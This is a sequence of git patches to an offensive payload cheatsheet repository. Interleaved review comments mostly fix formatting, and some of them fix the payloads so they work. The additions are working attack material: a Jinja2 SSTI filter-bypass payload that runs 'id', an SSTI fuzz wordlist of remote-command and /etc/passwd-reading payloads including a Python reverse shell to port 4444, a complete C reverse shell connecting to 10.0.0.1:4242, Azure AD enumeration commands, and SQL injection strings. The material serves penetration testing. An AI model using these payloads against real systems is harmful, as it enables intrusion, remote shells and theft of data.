--- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -177,3 +177,4 @@ function reqListener() { * [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) +* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) From 29194a8ef1ecfad7cb461bf4bb9096476e4cfe05 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Mon, 13 Apr 2020 19:06:01 +0200 Subject: [PATCH 23/85] Add others shell on reverse shell cheatsheet Add others shell on reverse shell cheatsheet --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 9eb5efc..67d626f 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -54,6 +54,8 @@ Listener: nc -u -lvp 4242 ``` +Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash + ### Socat ```powershell From cc3b05017dff2055ee3fe187a27437390b1b100a Mon Sep 17 00:00:00 2001 From: chiv Date: Mon, 13 Apr 2020 18:44:16 +0100 Subject: [PATCH 24/85] Added a new RCE payload to Jinja2 SSTI bypasses --- Server Side Template Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79c2a9f..4544769 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
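Review bot: grammar in the added line of the reverse-shell cheatsheet: `Don't forget to check with others shell : sh, ash, ...` should read `Don't forget to try the other shells: sh, ash, ...` (plural, and no space before the colon, matching the rest of the file).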
@@ -368,6 +368,11 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'): +```python +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +``` + ## Jinjava ### Basic injection From 7e7f5e762831266b22531c258d628172c7038bb9 Mon Sep 17 00:00:00 2001 From: chiv Date: Mon, 13 Apr 2020 18:48:43 +0100 Subject: [PATCH 25/85] Added SSTI RCE bypass payload for Jinja2 --- Server Side Template Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 4544769..2c35f22 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -368,7 +368,7 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` -Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'): +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus: ```python {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} ``` From af6760ef7a6bf0630866f7f0ffcd8dddfd0cfaa6 Mon Sep 17 00:00:00 2001 
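Review bot: the new `Bypassing most common filters ...:` line has no blank line before its fence, unlike the other entries in the Jinja2 section, so some renderers will glue the sentence to the code block. The word `filters` is ambiguous here because Jinja2 also calls `|join` a filter; say `blocked characters and keywords` so the list `('.','_','|join','[',']','mro' and 'base')` is read as what the payload avoids, not as Jinja2 filters being applied.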
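Review bot: the attribution `by https://twitter.com/SecGus` is a bare URL inside a sentence; the rest of the file attributes with markdown links, so `by [@SecGus](https://twitter.com/SecGus)` keeps the style consistent and renders as a name rather than a raw address.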
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 17 Apr 2020 16:34:51 +0200 Subject: [PATCH 26/85] RoadRecon + JSON None refs --- JSON Web Token/README.md | 1 + .../Active Directory Attack.md | 3 ++- .../Cloud - Azure Pentest.md | 16 +++++++++++++++- 3 files changed, 18 insertions(+), 2 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index c4063d8..e186299 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -279,3 +279,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) +- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0da35ca..ce4d6d8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -1570,4 +1570,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) -* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) \ No newline at end of file +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 26548db..9c4d692 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md 
@@ -172,6 +172,19 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest ## Azure AD - Enumeration +> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph. + +```powershell +$ git clone https://github.com/dirkjanm/ROADtools +$ pip install roadrecon +$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] +$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] +$ roadrecon dump +$ roadrecon gui +``` + +Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD + ```powershell PS C:\> git clone https://github.com/adrecon/AzureADRecon.git PS C:\> Install-Module -Name AzureAD @@ -429,4 +442,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) -* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) \ No newline at end of file +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) \ No newline at end of file 
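Review bot: in the `roadrecon` block the `auth` and `gather` lines are copied usage synopses (`[-h] [-u USERNAME] [-p PASSWORD] ...`) rather than commands, yet they sit behind a `$` prompt like the runnable `roadrecon dump` and `roadrecon gui` lines; either show one concrete invocation per step or move the bracketed option lists out of the prompt block. `Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD` should become a full sentence with a markdown link, e.g. `The collected data can be loaded into BloodHound using the [BloodHound-AzureAD fork](https://github.com/dirkjanm/BloodHound-AzureAD).` The blockquote makes the defensive point of the section (restricting the portal does not restrict Azure AD Graph queries) and is worth keeping as the lead.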
From 1d8414c703d09727c80317cce259df9d77a5bd4d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 18 Apr 2020 21:18:22 +0200 Subject: [PATCH 27/85] ASP.NET Razor SSTI --- Server Side Template Injection/README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 49c4b93..5998047 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -41,6 +41,9 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [ASP.NET Razor](#aspnet-razor) + * [Basic injection](#basic-injection) + * [Command execution](#command-execution) * [References](#references) ## Tools @@ -418,6 +421,21 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` +## ASP.NET Razor + +### Basic injection + +```powershell +@(1+2) +``` + +### Command execution + +```csharp +@{ + // C# code +} +``` ## References 
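Review bot: the three TOC entries added for ASP.NET Razor reuse the anchors `#basic-injection` and `#command-execution`, which already belong to earlier engines; GitHub de-duplicates repeated headings as `#basic-injection-1`, `-2` and so on, so these links jump to the first engine's section (the Jinjava entries in the context lines have the same defect and could be fixed in the same change). The `@(1+2)` block is fenced `powershell`; `cshtml` or `csharp` is the right tag. The `Command execution` block is only a `// C# code` placeholder, so link the Clément Notin post added to References from this section so readers know where the worked example lives, and add the blank line before `## References` that the other sections have.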
@@ -434,3 +452,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) +* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) \ No newline at end of file From ade039c1bc0342a0edd557bb7a9caf178badd8a3 Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Tue, 21 Apr 2020 10:49:47 +0200 Subject: [PATCH 28/85] Add insomnia to GraphQL list of tools --- GraphQL Injection/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 725bee0..4c750a3 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -26,6 +26,7 @@ * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) +* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/) ## Exploit 
@@ -291,4 +292,4 @@ mutation finishChannelVerificationMutation( * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) * [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) -* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) \ No newline at end of file +* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) From 95fed140ecdd652309fc312c04a18f1c3b42142b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 21 Apr 2020 11:13:19 +0200 Subject: [PATCH 29/85] Fix - SSTI Payloads --- GraphQL Injection/README.md | 23 ++++++ .../Intruder/JHADDIX_SSI_Injection.txt | 75 ------------------- .../Intruder/ssi_quick.txt | 18 ----- .../Intruder/ssti.fuzz | 49 ++++++++++++ 4 files changed, 72 insertions(+), 93 deletions(-) delete mode 100644 Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt delete mode 100644 Server Side Template Injection/Intruder/ssi_quick.txt create mode 100644 Server Side Template Injection/Intruder/ssti.fuzz diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 4c750a3..12734ff 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md 
@@ -24,6 +24,7 @@ * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) * [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) +* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) * [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/) 
@@ -155,6 +156,28 @@ query IntrospectionQuery { } ``` +### List path + +```php +$ git clone https://gitlab.com/dee-see/graphql-path-enum +$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill +Found 27 ways to reach the "Skill" node from the "Query" node: +- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (job_listing) -> JobListing (team) -> Team 
(audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (query) -> Query (skills) -> Skill +``` ### Extract data diff --git a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt b/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt deleted file mode 100644 index 9b7ba08..0000000 --- a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt +++ /dev/null @@ -1,75 +0,0 @@ -
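Review bot: the `+### List path` hunk shows a shell session but its fence is tagged `php`; the rest of this README tags shell examples `powershell`, so use that (or `bash`) so the highlighter does not mangle the `->` arrows. Two smaller points in the same hunk: the pasted output announces `Found 27 ways` but only 15 paths follow, so either paste the full output or end the list with `...` to show it was trimmed; and `-i ./test_data/h1_introspection.json` is the tool's bundled sample, so one sentence saying the input is the JSON response of the introspection query shown just above would tell readers what to feed it on a real target.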
-
 
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/Server Side Template Injection/Intruder/ssi_quick.txt b/Server Side Template Injection/Intruder/ssi_quick.txt deleted file mode 100644 index fef3ab2..0000000 --- a/Server Side Template Injection/Intruder/ssi_quick.txt +++ /dev/null @@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz new file mode 100644 index 0000000..ced385b --- /dev/null +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -0,0 +1,49 @@ + +{{4*4}}[[5*5]] +{{7*7}} +{{7*'7'}} +<%= 7 * 7 %> +${3*3} +${{7*7}} +@(1+2) +#{3*3} +#{ 7 * 7 } +{{dump(app)}} +{{app.request.server.all|join(',')}} +{{config.items()}} +{{ [].class.base.subclasses() }} +{{''.class.mro()[1].subclasses()}} +{{ ''.__class__.__mro__[2].__subclasses__() }} +{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %} +{{'a'.toUpperCase()}} +{{ request }} +{{self}} +<%= File.open('/etc/passwd').read %> +<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} +${"freemarker.template.utility.Execute"?new()("id")} +{{app.request.query.filter(0,0,1024,{'options':'system'})}} +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} +{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} +{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} +{$smarty.version} +{php}echo `id`;{/php} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} +{{request|attr(["_"*2,"class","_"*2]|join)}} +{{request|attr(["__","class","__"]|join)}} +{{request|attr("__class__")}} +{{request.__class__}} +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; 
x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} +${T(java.lang.System).getenv()} +${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} \ No newline at end of file From 89f906f7a8e8dd6311abaebfc19910cf0814acf3 Mon Sep 17 00:00:00 2001 
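Review bot: several entries in the new `ssti.fuzz` list will not work as written. `${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}` uses the relative path `etc/passwd`; it should be `/etc/passwd`. The Jinja2 loop `{% for key, value in config.iteritems() %} ... {% endfor %}` is spread over three lines, but an Intruder list is one payload per line, so each fragment would be sent on its own; put it on one line, and prefer `config.items()` since `iteritems()` only exists on Python 2. The `ScriptEngineManager` entries and the Python reverse-shell entry still carry `\"` and `\\\"` escapes from the quoted-string context they were copied from; a raw wordlist should hold the unescaped payload, otherwise the backslashes are sent literally. The hard-coded `__subclasses__()[40]` and `[396]` indices are environment specific, which is acceptable for a fuzz list but should be mentioned where the README points at this file.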
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 21 Apr 2020 11:17:39 +0200 Subject: [PATCH 30/85] Fix issue - C reverse shell --- .../Reverse Shell Cheatsheet.md | 36 +++++++++++++++++++ .../Files/SSRF_expect.svg | 0 .../Files/SSRF_url.svg | 0 3 files changed, 36 insertions(+) rename {Server Side Template Injection => Server Side Request Forgery}/Files/SSRF_expect.svg (100%) rename {Server Side Template Injection => Server Side Request Forgery}/Files/SSRF_url.svg (100%) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 67d626f..63346eb 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -25,6 +25,7 @@ * [NodeJS](#nodejs) * [Groovy](#groovy) * [Groovy Alternative 1](#groovy-alternative-1) + * [C](#c) * [Meterpreter Shell](#meterpreter-shell) * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) @@ -294,6 +295,41 @@ Thread.start { } ``` +### C + +Compile with `gcc /tmp/shell.c --output csh && csh` + +```csharp +#include +#include +#include +#include +#include +#include +#include + +int main(void){ + int port = 4242; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + + return 0; +} +``` + ## Meterpreter Shell ### Windows Staged reverse TCP 
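Review bot: the compile-and-run line `gcc /tmp/shell.c --output csh && csh` in the new `### C` section runs `csh` from `$PATH`, which on most systems is the C shell, not the binary just built; use `./csh` or a less confusable name such as `./rev`. In the hunk itself the seven `#include` lines carry no header names, so as displayed the file cannot compile; it needs at least `<sys/socket.h>`, `<netinet/in.h>`, `<arpa/inet.h>` and `<unistd.h>` (check that the angle-bracket names were not eaten by the markdown renderer). The fence is tagged `csharp` for C code; tag it `c`. Finally the return value of `connect()` is ignored, so when the listener is down the three `dup2()` calls point stdio at a dead socket and `execve("/bin/sh", ...)` still runs blind; an `if (connect(...) < 0) return 1;` makes a failed callback exit cleanly instead.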
diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Request Forgery/Files/SSRF_expect.svg similarity index 100% rename from Server Side Template Injection/Files/SSRF_expect.svg rename to Server Side Request Forgery/Files/SSRF_expect.svg diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Request Forgery/Files/SSRF_url.svg similarity index 100% rename from Server Side Template Injection/Files/SSRF_url.svg rename to Server Side Request Forgery/Files/SSRF_url.svg From c8c4a6e8a9a75688cd2a49f4605f40a77b576b25 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 21 Apr 2020 11:26:49 +0200 Subject: [PATCH 31/85] Fix issue #185 --- SQL Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 25b035e..f57a4f7 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -288,6 +288,8 @@ tamper=name_of_the_tamper "&" "^" "*" +'--' +"--" " or ""-" " or "" " " or ""&" From eaac0e748eabbf25d63a88d2d8c7e69f8b6677c0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 21 Apr 2020 11:31:18 +0200 Subject: [PATCH 32/85] Fix issue #185 --- SQL Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index f57a4f7..f3eeb33 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -290,6 +290,7 @@ tamper=name_of_the_tamper "*" '--' "--" +'--' / "--" " or ""-" " or "" " " or ""&" From 2740600a6b577bb570301b602fd4a93f6eac7090 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Tue, 21 Apr 2020 19:21:51 +0200 Subject: [PATCH 33/85] Alternative TTY method with /usr/bin/script --- .../Reverse Shell Cheatsheet.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) 
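Review bot: the two `Fix issue #185` hunks in `SQL Injection/README.md` end up adding `'--'`, `"--"` and then `'--' / "--"` on three consecutive lines; the third line only restates the first two, so keep either the two separate entries or the combined one, and squash the two commits since the second exists only to redo the first.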
